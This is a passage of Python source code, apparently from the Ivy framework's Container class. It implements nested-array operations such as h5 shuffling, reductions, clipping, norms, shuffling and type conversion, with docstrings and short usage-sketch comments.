batch_size = value_shape[0]
else:
raise Exception('Item found inside h5_obj which was neither a Group nor a Dataset.')
return size, batch_size
@staticmethod
def shuffle_h5_file(h5_obj_or_filepath, seed_value=0):
"""
Shuffle entries in all datasets of h5 file, such that they are still aligned along axis 0.
:param h5_obj_or_filepath: Filepath where the container object is saved to disk, or h5 object.
:type h5_obj_or_filepath: str or h5 obj
:param seed_value: random seed to use for array shuffling
:type seed_value: int
"""
if seed_value is None:
seed_value = _random.randint(0, 1000)
if type(h5_obj_or_filepath) is str:
h5_obj = _h5py.File(h5_obj_or_filepath, 'a')
else:
h5_obj = h5_obj_or_filepath
for key, value in sorted(h5_obj.items()):
if isinstance(value, _h5py.Group):
Container.shuffle_h5_file(value, seed_value)
elif isinstance(value, _h5py.Dataset):
_random.seed(seed_value)
# noinspection PyTypeChecker
_random.shuffle(value)
else:
raise Exception('Item found inside h5_obj which was neither a Group nor a Dataset.')
if isinstance(h5_obj, _h5py.File):
h5_obj.close()
@staticmethod
def reduce(containers, reduction, config=None):
"""
Reduce containers.
:param containers: containers to reduce
:type containers: sequence of Container objects
:param reduction: the reduction function
:type reduction: callable with single list input x
:param config: The configuration for the containers. Default is the same as container0.
:type config: dict, optional
:return: reduced containers
"""
container0 = containers[0]
if not _ivy.exists(config):
config = container0.config if isinstance(container0, Container) else {}
if isinstance(container0, Container):
return_dict = dict()
for key in container0.keys():
return_dict[key] = Container.reduce([container[key] for container in containers], reduction)
return Container(return_dict, **config)
else:
# noinspection PyBroadException
try:
return reduction(containers)
except Exception as e:
raise Exception(str(e) + '\nContainer reduce operation only valid for containers of arrays')
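# Minimal usage sketch for reduce (hypothetical containers, numpy-like backend assumed):
#
#   a = Container({'x': ivy.array([1., 2.])})
#   b = Container({'x': ivy.array([3., 4.])})
#   Container.reduce([a, b], sum)  # leaf 'x' becomes the elementwise sum [4., 6.]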
# Private Methods #
# ----------------#
def _get_shape(self):
if not len(self.keys()):
if _ivy.exists(self._queues):
return [self._queue_load_sizes_cum[-1]]
return [0]
sub_shapes =\
[v for k, v in self.map(lambda x, kc: list(x.shape) if self._ivy.is_array(x)
else ([len(x)] if isinstance(x, (list, tuple, _ivy.MultiDev)) else None)).to_iterator() if v]
if not sub_shapes:
return sub_shapes
min_num_dims = min([len(sub_shape) for sub_shape in sub_shapes])
sub_shapes_array = _np.asarray([sub_shape[0:min_num_dims] for sub_shape in sub_shapes])
sub_shapes_array = _np.where(sub_shapes_array == 0, -1, sub_shapes_array)
mask = _np.prod(sub_shapes_array / sub_shapes_array[0:1], 0) == 1
# noinspection PyTypeChecker
return [None if _np.isnan(i) else int(i)
for i in _np.where(mask, sub_shapes_array[0], _np.ones(min_num_dims)*float('nan')).tolist()]
def _get_shapes(self):
return self.map(lambda x, kc: x.shape if hasattr(x, 'shape') else None)
def _get_dev_str(self):
sub_dev_strs =\
[v for k, v in self.map(lambda x, kc: self._ivy.dev_str(x)
if self._ivy.is_array(x) else None).to_iterator() if v]
if len(set(sub_dev_strs)) <= 1:
return sub_dev_strs[0]
return None
def _at_key_chains_input_as_seq(self, key_chains, ignore_key_errors=False):
return_cont = Container(dict(), **self._config)
for kc in key_chains:
val = self.at_key_chain(kc, ignore_key_errors=ignore_key_errors)
if ignore_key_errors and not _ivy.exists(val):
continue
return_cont.set_at_key_chain(kc, val, inplace=True)
return return_cont
def _at_key_chains_input_as_dict(self, key_chains, current_chain='', ignore_key_errors=False):
return_dict = dict()
for k, v in key_chains.items():
if current_chain == '':
new_current_chain = k
else:
new_current_chain = current_chain + '/' + k
if isinstance(v, dict):
return_dict[k] = self._at_key_chains_input_as_dict(v, new_current_chain,
ignore_key_errors=ignore_key_errors)
else:
val = self.at_key_chain(new_current_chain, ignore_key_errors=ignore_key_errors)
if ignore_key_errors and not _ivy.exists(val):
continue
return_dict[k] = val
return Container(return_dict, **self._config)
def _prune_key_chains_input_as_seq(self, key_chains):
return_cont = self.copy()
for kc in key_chains:
return_cont = return_cont.prune_key_chain(kc)
return return_cont
def _prune_key_chains_input_as_dict(self, key_chains, return_cont=None):
if return_cont is None:
return_cont = self.copy()
for k, v in key_chains.items():
if isinstance(v, dict):
ret_cont = self._prune_key_chains_input_as_dict(v, return_cont[k])
if ret_cont.shape[0] == 0:
del return_cont[k]
else:
del return_cont[k]
return return_cont
# Public Methods #
# ---------------#
def set_framework(self, ivyh):
"""
Update the framework to use for the container.
"""
self._ivy = ivyh
self._config['ivyh'] = ivyh
return self
def all_true(self, assert_is_bool=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Determine whether all the entries in the container boolean evaluate to True.
:param assert_is_bool: Whether or not to assert each entry is of type Boolean.
:type assert_is_bool: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Boolean, whether all entries are boolean True.
"""
return bool(_np.prod([v for k, v in self.as_bools(
assert_is_bool, key_chains, to_apply, prune_unapplied).to_iterator()]))
def all_false(self, assert_is_bool=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Determine whether all the entries in the container boolean evaluate to False.
:param assert_is_bool: Whether or not to assert each entry is of type Boolean.
:type assert_is_bool: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Boolean, whether all entries are boolean False.
"""
return not bool(_np.sum([v for k, v in self.as_bools(
assert_is_bool, key_chains, to_apply, prune_unapplied).to_iterator()]))
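# Minimal usage sketch for all_true / all_false (hypothetical container):
#
#   flags = Container({'a': True, 'sub': {'b': False}})
#   flags.all_true()   # False, since 'sub/b' evaluates to False
#   flags.all_false()  # False, since 'a' evaluates to True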
def reduce_sum(self, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes sum of array elements along a given axis for all sub-arrays of container object.
:param axis: Axis or axes along which a sum is performed. The default, axis=None, will sum all of the elements
of the input array. If axis is negative it counts from the last to the first axis. If axis is a
tuple of ints, a sum is performed on all of the axes specified in the tuple instead of a single
axis or all the axes as before.
:type axis: int or sequence of ints
:param keepdims: If this is set to True, the axes which are reduced are left in the result as dimensions with
size one. With this option, the result will broadcast correctly against the input array.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with the sums computed for all sub-arrays.
"""
return self.map(lambda x, kc: self._ivy.reduce_sum(x, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
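# Minimal usage sketch for the reduction methods (hypothetical container, numpy-like backend assumed):
#
#   cont = Container({'x': ivy.array([[1., 2.], [3., 4.]])})
#   cont.reduce_sum()                          # leaf 'x' reduced to 10.
#   cont.reduce_sum(axis=0)                    # leaf 'x' becomes [4., 6.]
#   cont.reduce_mean(axis=-1, keepdims=True)   # leaf 'x' becomes [[1.5], [3.5]]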
def reduce_prod(self, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes product of array elements along a given axis for all sub-arrays of container object.
:param axis: Axis or axes along which a product is performed. The default, axis=None, will multiply all of the
elements of the input array. If axis is negative it counts from the last to the first axis. If axis
is a tuple of ints, a multiplication is performed on all of the axes specified in the tuple instead
of a single axis or all the axes as before.
:type axis: int or sequence of ints
:param keepdims: If this is set to True, the axes which are reduced are left in the result as dimensions with
size one. With this option, the result will broadcast correctly against the input array.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with the products computed for all sub-arrays.
"""
return self.map(lambda x, kc: self._ivy.reduce_prod(x, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def reduce_mean(self, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes mean of array elements along a given axis for all sub-arrays of container object.
:param axis: Axis or axes along which the mean is computed. The default, axis=None, will compute the mean of all
the elements of the input array. If axis is negative it counts from the last to the first axis. If axis is a
tuple of ints, the mean is computed over all of the axes specified in the tuple instead of a single
axis or all the axes as before.
:type axis: int or sequence of ints
:param keepdims: If this is set to True, the axes which are reduced are left in the result as dimensions with
size one. With this option, the result will broadcast correctly against the input array.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with the means computed for all sub-arrays.
"""
return self.map(lambda x, kc: self._ivy.reduce_mean(x, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def reduce_var(self, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes variance of array elements along a given axis for all sub-arrays of container object.
:param axis: Axis or axes along which the variance is computed. The default, axis=None, will compute the variance of
all the elements of the input array. If axis is negative it counts from the last to the first axis. If axis is a
tuple of ints, the variance is computed over all of the axes specified in the tuple instead of a single
axis or all the axes as before.
:type axis: int or sequence of ints
:param keepdims: If this is set to True, the axes which are reduced are left in the result as dimensions with
size one. With this option, the result will broadcast correctly against the input array.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with the variance computed for all sub-arrays.
"""
return self.map(lambda x, kc: self._ivy.reduce_var(x, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def reduce_std(self, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes standard deviation of array elements along a given axis for all sub-arrays of container object.
:param axis: Axis or axes along which the standard deviation is computed. The default, axis=None, will compute the
standard deviation of all the elements of the input array. If axis is negative it counts from the last to the first
axis. If axis is a tuple of ints, the standard deviation is computed over all of the axes specified in the tuple
instead of a single axis or all the axes as before.
:type axis: int or sequence of ints
:param keepdims: If this is set to True, the axes which are reduced are left in the result as dimensions with
size one. With this option, the result will broadcast correctly against the input array.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with the standard deviation computed for all sub-arrays.
"""
return self.map(lambda x, kc: self._ivy.reduce_std(x, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def reduce_min(self, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes min of array elements along a given axis for all sub-arrays of container object.
:param axis: Axis or axes along which the minimum is computed. The default, axis=None, will compute the minimum of
all the elements of the input array. If axis is negative it counts from the last to the first axis. If axis is a
tuple of ints, the minimum is computed over all of the axes specified in the tuple instead of a single
axis or all the axes as before.
:type axis: int or sequence of ints
:param keepdims: If this is set to True, the axes which are reduced are left in the result as dimensions with
size one. With this option, the result will broadcast correctly against the input array.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with the minimums computed for all sub-arrays.
"""
return self.map(lambda x, kc: self._ivy.reduce_min(x, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def reduce_max(self, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes max of array elements along a given axis for all sub-arrays of container object.
:param axis: Axis or axes along which the maximum is computed. The default, axis=None, will compute the maximum of
all the elements of the input array. If axis is negative it counts from the last to the first axis. If axis is a
tuple of ints, the maximum is computed over all of the axes specified in the tuple instead of a single
axis or all the axes as before.
:type axis: int or sequence of ints
:param keepdims: If this is set to True, the axes which are reduced are left in the result as dimensions with
size one. With this option, the result will broadcast correctly against the input array.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with the maximums computed for all sub-arrays.
"""
return self.map(lambda x, kc: self._ivy.reduce_max(x, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def minimum(self, other, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes the elementwise minimum between this container and another container or number.
:param other: The other container or number to compute the minimum against.
:type other: Ivy container or number
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays having the minimum values computed.
"""
is_container = isinstance(other, Container)
return self.map(lambda x, kc:
self._ivy.minimum(x, other[kc] if is_container else other) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def maximum(self, other, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes the elementwise maximum between this container and another container or number.
:param other: The other container or number to compute the maximum against.
:type other: Ivy container or number
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays having the maximum values computed.
"""
is_container = isinstance(other, Container)
return self.map(lambda x, kc:
self._ivy.maximum(x, other[kc] if is_container else other) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def clip(self, clip_min, clip_max, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes the elementwise clipped values between this container and clip_min and clip_max containers or numbers.
:param clip_min: The minimum container or number to clip against.
:type clip_min: Ivy container or number
:param clip_max: The maximum container or number to clip against.
:type clip_max: Ivy container or number
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays having the clipped values returned.
"""
min_is_container = isinstance(clip_min, Container)
max_is_container = isinstance(clip_max, Container)
return self.map(lambda x, kc:
self._ivy.clip(x, clip_min[kc] if min_is_container else clip_min,
clip_max[kc] if max_is_container else clip_max) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
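# Minimal usage sketch for minimum / maximum / clip (hypothetical container):
#
#   cont = Container({'x': ivy.array([-2., 0.5, 3.])})
#   cont.minimum(1.)    # leaf 'x' -> [-2., 0.5, 1.]
#   cont.maximum(0.)    # leaf 'x' -> [0., 0.5, 3.]
#   cont.clip(0., 1.)   # leaf 'x' -> [0., 0.5, 1.]
#   # the bounds may also be containers with a matching key structure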
def clip_vector_norm(self, max_norm, p, global_norm=False, key_chains=None, to_apply=True,
prune_unapplied=False):
"""
Clips the vector p-norm of each array in the container to the specified max_norm.
:param max_norm: The max norm container or number to clip against.
:type max_norm: Ivy container or number
:param p: The p-value for computing the p-norm container or number.
:type p: Ivy container or number
:param global_norm: Whether to compute the norm across all the concatenated sub-arrays. Default is False.
:type global_norm: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays having the clipped norms returned.
"""
max_norm_is_container = isinstance(max_norm, Container)
p_is_container = isinstance(p, Container)
if global_norm:
if max_norm_is_container or p_is_container:
raise Exception(
'global_norm can only be computed for scalar max_norm and p_val arguments,'
'but found {} and {} of type {} and {} respectively'.format(
max_norm, p, type(max_norm), type(p)))
vector_norm = self.vector_norm(p, global_norm=True)
ratio = max_norm/vector_norm
if ratio < 1:
return self * ratio
return self.copy()
return self.map(lambda x, kc:
self._ivy.clip_vector_norm(
x, max_norm[kc] if max_norm_is_container else max_norm,
p[kc] if p_is_container else p) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def einsum(self, equation, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Sums the product of the elements of the input operands along dimensions specified using a notation based on the
Einstein summation convention, for each array in the container.
:param equation: A str describing the contraction, in the same format as numpy.einsum.
:type equation: str
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with einsum applied to all sub-arrays.
"""
return self.map(lambda x, kc: self._ivy.einsum(equation, x) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def vector_norm(self, p=2, axis=None, keepdims=False, global_norm=False, key_chains=None, to_apply=True,
prune_unapplied=False):
"""
Compute vector p-norm for each array in the container.
:param p: Order of the norm. Default is 2.
:type p: int or str or container, optional
:param axis: If axis is an integer, it specifies the axis of x along which to compute the vector norms.
Default is None, in which case the flattened array is considered.
:type axis: int or sequence of ints, optional
:param keepdims: If this is set to True, the axes which are normed over are left in the result as dimensions
with size one. With this option the result will broadcast correctly against the original x.
Default is False.
:type keepdims: bool, optional
:param global_norm: Whether to compute the norm across all the concatenated sub-arrays. Default is False.
:type global_norm: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with the vector norms for each sub-array returned.
"""
p_is_container = isinstance(p, Container)
if global_norm:
if p_is_container:
raise Exception(
'global_norm can only be computed for scalar p argument,'
'but found {} of type {}'.format(p, type(p)))
return sum([v for k, v in
self.map(lambda x, kc: self._ivy.reduce_sum(x ** p)).to_iterator()]) ** (1/p)
return self.map(lambda x, kc: self._ivy.vector_norm(x, p[kc] if p_is_container else p, axis, keepdims)
if self._ivy.is_array(x) else x, key_chains, to_apply, prune_unapplied)
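# Minimal usage sketch for vector_norm (hypothetical container, numpy-like backend assumed):
#
#   cont = Container({'x': ivy.array([3., 4.]), 'y': ivy.array([1., 0.])})
#   cont.vector_norm()                  # per-leaf 2-norms: 'x' -> 5., 'y' -> 1.
#   cont.vector_norm(global_norm=True)  # single scalar norm over all leaves combined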
def matrix_norm(self, p=2, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Compute matrix p-norm for each array in the container.
:param p: Order of the norm. Default is 2.
:type p: int or str, optional
:param axis: If axis is an integer, it specifies the axis of x along which to compute the matrix norms.
Default is None, in which case the flattened array is considered.
:type axis: int or sequence of ints, optional
:param keepdims: If this is set to True, the axes which are normed over are left in the result as dimensions
with size one. With this option the result will broadcast correctly against the original x.
Default is False.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with the matrix norms for each sub-array returned.
"""
return self.map(lambda x, kc: self._ivy.matrix_norm(x, p, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def flip(self, axis=None, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Reverses the order of elements in for each array in the container, along the given axis.
The shape of the array is preserved, but the elements are reordered.
:param axis: Axis or axes along which to flip over. The default, axis=None, will flip over all axes.
:type axis: None or int or sequence of ints, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays flipped along the given axis.
"""
return self.map(lambda x, kc: self._ivy.flip(x, axis) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def shuffle(self, seed_value=None, key_chains=None, to_apply=True, prune_unapplied=False, key_chain=''):
"""
Shuffle entries in all sub-arrays, such that they are still aligned along axis 0.
:param seed_value: random seed to use for array shuffling
:type seed_value: int
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:param key_chain: Chain of keys for this dict entry
:type key_chain: str
"""
return_dict = dict()
if seed_value is None:
seed_value = self._ivy.to_numpy(self._ivy.random.randint(0, 1000, ())).item()
for key, value in sorted(self.items()):
this_key_chain = key if key_chain == '' else (key_chain + '/' + key)
if isinstance(value, Container):
ret = value.shuffle(seed_value, key_chains, to_apply, prune_unapplied, this_key_chain)
if ret:
return_dict[key] = ret
else:
if key_chains is not None:
if (this_key_chain in key_chains and not to_apply) or (
this_key_chain not in key_chains and to_apply):
if prune_unapplied:
continue
return_dict[key] = value
continue
self._ivy.seed(seed_value)
return_dict[key] = self._ivy.shuffle(value)
return Container(return_dict, **self._config)
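# Minimal usage sketch for shuffle (hypothetical container; leaves share the same axis-0 length):
#
#   cont = Container({'x': ivy.array([[1.], [2.], [3.]]), 'y': ivy.array([[10.], [20.], [30.]])})
#   shuffled = cont.shuffle(seed_value=0)
#   # rows of 'x' and 'y' are permuted with the same ordering, so they remain aligned along axis 0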
def slice_via_key(self, slice_key):
"""
Get slice of container, based on key.
:param slice_key: key to slice container at.
:type slice_key: str
:return: Container object sliced at desired key.
"""
return_dict = dict()
for key, value in sorted(self.items()):
if key == slice_key:
return value
elif isinstance(value, Container):
return_dict[key] = value.slice_via_key(slice_key)
else:
return_dict[key] = value
return Container(return_dict, **self._config)
def as_ones(self, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Return arrays of ones for all nested arrays in the container.
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays filled with ones.
"""
return self.map(lambda x, kc: self._ivy.ones_like(x) if self._ivy.is_array(x) else x, key_chains, to_apply,
prune_unapplied)
def as_zeros(self, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Return arrays of zeros for all nested arrays in the container.
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays filled with zeros.
"""
return self.map(lambda x, kc: self._ivy.zeros_like(x) if self._ivy.is_array(x) else x, key_chains, to_apply,
prune_unapplied)
def as_bools(self, assert_is_bool=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Return boolean evaluation for all nested items in the container.
:param assert_is_bool: Whether or not to assert the entry is of type Boolean.
:type assert_is_bool: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all entries boolean evaluated.
"""
def _ret_bool(x):
if assert_is_bool:
assert isinstance(x, bool)
return x
return bool(x)
return self.map(lambda x, kc: _ret_bool(x), key_chains, to_apply, prune_unapplied)
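# Minimal usage sketch for as_bools (hypothetical container):
#
#   cont = Container({'a': 1, 'sub': {'b': 0}})
#   cont.as_bools().to_dict()   # {'a': True, 'sub': {'b': False}}
#   # cont.as_bools(assert_is_bool=True) would raise, since the entries are ints rather than bools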
def as_random_uniform(self, low=0.0, high=1.0, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Return arrays of random uniform values for all nested arrays in the container.
:param low: Lower boundary of the output interval. All values generated will be greater than or equal to low.
The default value is 0.
:type low: float
:param high: Upper boundary of the output interval. All values generated will be less than high.
The default value is 1.0.
:type high: float
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays filled with random uniform values.
"""
return self.map(lambda x, kc: self._ivy.random_uniform(
low, high, x.shape, self._ivy.dev_str(x)) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def to_native(self, nested=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Return native framework arrays for all nested arrays in the container.
:param nested: Whether to apply the conversion on arguments in a nested manner. If so, all dicts, lists and
tuples will be traversed to their lowest leaves in search of ivy.Array and ivy.Variable
instances. Default is False.
:type nested: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays converted to their native format.
"""
return self.map(lambda x, kc: self._ivy.to_native(x, nested=nested), key_chains, to_apply, prune_unapplied)
def to_ivy(self, nested=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Return ivy arrays for all nested native framework arrays in the container.
:param nested: Whether to apply the conversion on arguments in a nested manner. If so, all dicts, lists and
tuples will be traversed to their lowest leaves in search of native array and variable
instances. Default is False.
:type nested: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all native sub-arrays converted to their ivy.Array instances.
"""
return self.map(lambda x, kc: self._ivy.to_ivy(x, nested=nested), key_chains, to_apply, prune_unapplied)
def expand_dims(self, axis, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Expand dims of all sub-arrays of container object.
:param axis: Axis along which to expand dimensions of the sub-arrays.
:type axis: int
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-array dimensions expanded along the axis.
"""
return self.map(lambda x, kc: self._ivy.expand_dims(x, axis) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
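# Minimal usage sketch for expand_dims (hypothetical container):
#
#   cont = Container({'x': ivy.array([1., 2., 3.])})   # leaf shape (3,)
#   cont.expand_dims(0)    # leaf shape becomes (1, 3)
#   cont.expand_dims(-1)   # leaf shape becomes (3, 1)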
def dev_clone(self, dev_strs):
"""
Clone the current container across multiple devices.
:param dev_strs: The devices on which to clone the container.
:type dev_strs: sequence of str
:return: a set of cloned containers across the specified devices.
"""
return self._ivy.DevClonedItem({dev_str: self.to_dev(dev_str) for dev_str in dev_strs})
def dev_dist(self, dev_strs: Union[Iterable[str], Dict[str, int]], axis=0):
"""
Distribute the current container across multiple devices.
